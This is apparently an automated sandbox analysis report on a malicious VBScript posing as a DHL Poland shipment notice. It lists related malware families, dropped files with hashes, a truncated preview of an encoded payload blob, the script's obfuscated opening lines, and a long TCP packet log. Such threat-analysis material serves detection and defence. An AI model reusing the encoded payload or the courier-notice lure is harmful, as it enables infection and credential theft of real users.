            Doc230906103882.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 142.250.185.174
            • 142.250.186.161
            birectangular.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            • 142.250.185.174
            • 142.250.186.161
            AWB#276097479258.pdf.htmlGet hashmaliciousUnknownBrowse
            • 142.250.185.174
            • 142.250.186.161
            payment.exeGet hashmaliciousSnake KeyloggerBrowse
            • 142.250.185.174
            • 142.250.186.161
            Doc_CI_PL_HBL_COO_Insu_.exeGet hashmaliciousAgentTeslaBrowse
            • 142.250.185.174
            • 142.250.186.161

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

            Download File
            Process:C:\Windows\System32\wscript.exe
            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
            Category:dropped
            Size (bytes):71954
            Entropy (8bit):7.996617769952133
            Encrypted:true
            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

            Download File
            Process:C:\Windows\System32\wscript.exe
            File Type:data
            Category:modified
            Size (bytes):328
            Entropy (8bit):3.1379890379152853
            Encrypted:false
            SSDEEP:6:kKfe3D9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:HeqDnLNkPlE99SNxAhUe/3
            MD5:C9155294E053E835770FBA24E90053D1
            SHA1:68D97D36ECCF27FAF9BF1889DAE1E92502F05A1E
            SHA-256:112365E0D6BBE0304EF0A0E4A1D067017930A73E5F70FAB01B71687AF3D44431
            SHA-512:13396986B1A3FC44DA01C25002283FB4D9F576F7D704AF2087361E1C489DB64574E72D165D4ED97C76D1B595787DF764C580359A2C7CE0590227F9323EFE1606
            Malicious:false
            Reputation:low
            Preview:p...... ........&;.C....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ixx051i.f5s.psm1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wisucaoa.tgs.ps1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvzfs12a.csj.psm1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yofwurij.l4b.ps1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Roaming\Democratising.Spi

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with very long lines (65536), with no line terminators
            Category:dropped
            Size (bytes):437716
            Entropy (8bit):5.955092935655626
            Encrypted:false
            SSDEEP:12288:KQLR6RWQYniM1NJkMughemEtfY9SHiY/Znu14Y:Ku68RFkMug8fg9SCC8T
            MD5:18EC6FAA93EA8961A5328358419ABA01
            SHA1:23C624B18B327BDD0BE9928E3F4ECFA091F42773
            SHA-256:56018987B14F923D217C8808EA7977922ED2D35FFDFCC1CC2AF44FF45AD307FA
            SHA-512:66FE4796D21D0D95C9B43605D5D899CBF9518F86D367C89241C00B2F3545885BA05E8C819C128960FF970A362198F3151ACF29693910A006790D4D9850C17830
            Malicious:false
            Preview:6wLaLOsC5Fm7dZUQAHEBm+sCrQMDXCQE6wLVKnEBm7mPllGi6wL8EXEBm4HBjz2w/+sCJmtxAZuB8R7UAaJxAZvrAswc6wIX0esCH4W64o/i/OsCtpzrAm6CcQGbcQGbMcrrAl096wIQj4kUC3EBm+sCCgrR4nEBm3EBm4PBBOsCRqFxAZuB+UvNRAF8zHEBm3EBm4tEJATrAhpUcQGbicPrAspbcQGbgcMX0h8B6wKo/XEBm7rEp3FccQGb6wJTYoHqU6UpJnEBm+sCb+eB6nECSDbrAudW6wLK6+sCKGBxAZtxAZtxAZuLDBBxAZvrAniuiQwT6wKS+3EBm0JxAZvrAqO5gfq4nAQAddZxAZvrArOoiVwkDOsCn2XrAhAUge0AAwAAcQGb6wIJ2otUJAjrAiwL6wIZCot8JATrAoSy6wLVronrcQGbcQGbgcOcAAAA6wJAzusC3ClT6wJHC3EBm2pA6wIqcnEBm4nr6wLxG+sClN7HgwABAAAAcFgBcQGbcQGbgcMAAQAA6wJxqesCz8xT6wJqH3EBm4nrcQGbcQGbibsEAQAAcQGbcQGbgcMEAQAAcQGb6wIm9VPrAsPt6wJz9mr/cQGbcQGbg8IFcQGbcQGbMfbrAuFgcQGbMclxAZtxAZuLGusCbyrrAissQXEBm3EBmzkcCnX0cQGbcQGbRnEBm+sClk+AfAr7uHXfcQGbcQGbi0QK/HEBm3EBmynw6wJxZnEBm//ScQGbcQGburicBADrAmLLcQGbMcBxAZvrAplCi3wkDHEBm+sCp3iBNAddCaU+6wIE4HEBm4PABOsCdSBxAZs50HXk6wKyF+sCam2J++sCqnlxAZv/13EBm+sCNYDZ5sPJnto/t7iAIGqi9lqGKtr/GWjtf+E0PLG/5r6Iudg3XBeZgiBqovZayZ4YqC0SXFP70IBAhylfdvCqz11o9k8h79zIEvSEWCTP0QXg89n9JP8s27Isqs+KnQ4XIduaTag+

            Static File Info

            General

            File type:ASCII text, with CRLF line terminators
            Entropy (8bit):5.311882710759672
            TrID:
            • Visual Basic Script (13500/0) 100.00%
            File name:DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs
            File size:24'301 bytes
            MD5:3b5b96bb9765b0c37f926296a205a2d6
            SHA1:30ba62c4b319c4950bf70b83634bc8108c50c6da
            SHA256:31a8c9d6f61346b95e41ee64547aa6160932a0f740f4a712c26b6b7f1015a588
            SHA512:06e329ddad34da47c9b7db6da0ad18c1de2f9fff9601f489afc0fc5e92a133e65281084eeac14f026ca468ceff1ff1d70b01a0042eeb81680d50edbfa51fcafb
            SSDEEP:384:tEqYZcPlL8XOzXAK6W9H/tspWpf4fETh9QI32xeyBhvRs4bXKXD:tEqD9UOzddufwQIQf7Kz
            TLSH:5CB2E67B0B031D600F72B3B6A45F4AA8B18445AAF330D7212979AED7C404E97F5D897E
            File Content Preview:..................Set Batchkommandoens = CreateObject("WScript.Shell")..nyvurderingerne = -9780..Unauthorized = "Bhutansk. verdensmesterens."..Protesttog = &H5DBC..Superinjustice = &HFFFF3B7F..Disconcertedly28 = "Prakker; provocation;"..Omfangs = &H5521..

            File Icon

            Icon Hash:68d69b8f86ab9a86

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jul 3, 2024 08:52:16.288197994 CEST49738443192.168.2.4142.250.185.174
            Jul 3, 2024 08:52:16.288254023 CEST44349738142.250.185.174192.168.2.4
            Jul 3, 2024 08:52:16.288409948 CEST49738443192.168.2.4142.250.185.174
            Jul 3, 2024 08:52:16.294483900 CEST49738443192.168.2.4142.250.185.174
            Jul 3, 2024 08:52:16.294522047 CEST44349738142.250.185.174192.168.2.4
            Jul 3, 2024 08:52:16.929235935 CEST44349738142.250.185.174192.168.2.4
            Jul 3, 2024 08:52:16.929420948 CEST49738443192.168.2.4142.250.185.174
            Jul 3, 2024 08:52:16.930181026 CEST44349738142.250.185.174192.168.2.4
            Jul 3, 2024 08:52:16.930253983 CEST49738443192.168.2.4142.250.185.174
            Jul 3, 2024 08:52:16.936640978 CEST49738443192.168.2.4142.250.185.174
            Jul 3, 2024 08:52:16.936657906 CEST44349738142.250.185.174192.168.2.4
            Jul 3, 2024 08:52:16.936923981 CEST44349738142.250.185.174192.168.2.4
            Jul 3, 2024 08:52:16.943352938 CEST49738443192.168.2.4142.250.185.174
            Jul 3, 2024 08:52:16.988496065 CEST44349738142.250.185.174192.168.2.4
            Jul 3, 2024 08:52:17.305926085 CEST44349738142.250.185.174192.168.2.4
            Jul 3, 2024 08:52:17.307445049 CEST44349738142.250.185.174192.168.2.4
            Jul 3, 2024 08:52:17.307493925 CEST49738443192.168.2.4142.250.185.174
            Jul 3, 2024 08:52:17.311436892 CEST49738443192.168.2.4142.250.185.174
            Jul 3, 2024 08:52:17.321567059 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:17.321613073 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:17.321686029 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:17.322154999 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:17.322166920 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:17.969662905 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:17.969739914 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:17.971468925 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:17.971482038 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:17.972187042 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:17.974528074 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.020498037 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.761137009 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.761285067 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.761460066 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.761539936 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.762021065 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.762089014 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.762101889 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.767093897 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.767131090 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.767314911 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.767340899 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.767349005 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.767365932 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.767543077 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.767663002 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.767904997 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.767930031 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.767995119 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.768004894 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.768131971 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.768260956 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.768367052 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.768501043 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.768510103 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.769182920 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.769248962 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.769305944 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.769314051 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.769323111 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.769424915 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.769510031 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.769625902 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.769632101 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.770153046 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.770195961 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.770205975 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.770462036 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.770592928 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.770605087 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.773052931 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.773277044 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.773287058 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.773586035 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.773674011 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.773732901 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.773797989 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.773808002 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.774493933 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.774524927 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.774574041 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.774583101 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.774705887 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.774734020 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.775078058 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.775240898 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.775247097 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.775473118 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.775563002 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.775568962 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.776336908 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.776381969 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.776391983 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.776561022 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.776587963 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.776604891 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.776612043 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.776721954 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.776873112 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.777343988 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.777599096 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.777605057 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.780132055 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.780339003 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.780349016 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.784689903 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.785615921 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.785623074 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.789457083 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.789504051 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.789514065 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.793946981 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.793993950 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.794002056 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.798006058 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.798053980 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.798060894 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.802472115 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.802800894 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.802808046 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.806960106 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.809623957 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.809629917 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.811184883 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.811240911 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.811252117 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.815032959 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.815095901 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.815175056 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.815182924 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.817600012 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.819015980 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.822734118 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.822767973 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.822858095 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.822873116 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.825628042 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.826343060 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.829977036 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.830018997 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.830080032 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.830091000 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.833518028 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.833595991 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.833606005 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.833656073 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.836647987 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.844986916 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.845026016 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.845105886 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.845120907 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.845149994 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.845191956 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.845199108 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.845237970 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.846599102 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.848917007 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.848954916 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.849028111 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.849039078 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.849594116 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.850967884 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.853045940 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.853085995 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.853142023 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.853154898 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.853202105 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.855060101 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.857270956 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.857306004 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.857462883 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.857471943 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.857595921 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.859513998 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.861381054 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.861453056 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.861466885 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.863441944 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.863508940 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.863588095 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.863595963 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.865128994 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.865722895 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.867770910 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.867825985 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.867846966 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.867856026 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.869596004 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.869663954 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.871768951 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.871809006 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.871836901 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.871844053 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.873601913 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.873816013 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.875902891 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.875946999 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.875958920 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.875966072 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.876029968 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.877882957 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.879924059 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.879961014 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.879996061 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.880002975 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.881594896 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.882244110 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.883869886 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.883914948 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.883936882 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.883944035 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.885603905 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.886540890 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.887836933 CEST44349739142.250.186.161192.168.2.4
            Jul 3, 2024 08:52:18.887907028 CEST49739443192.168.2.4142.250.186.161
            Jul 3, 2024 08:52:18.887908936 CEST44349739142.250.186.161192.168.2.4
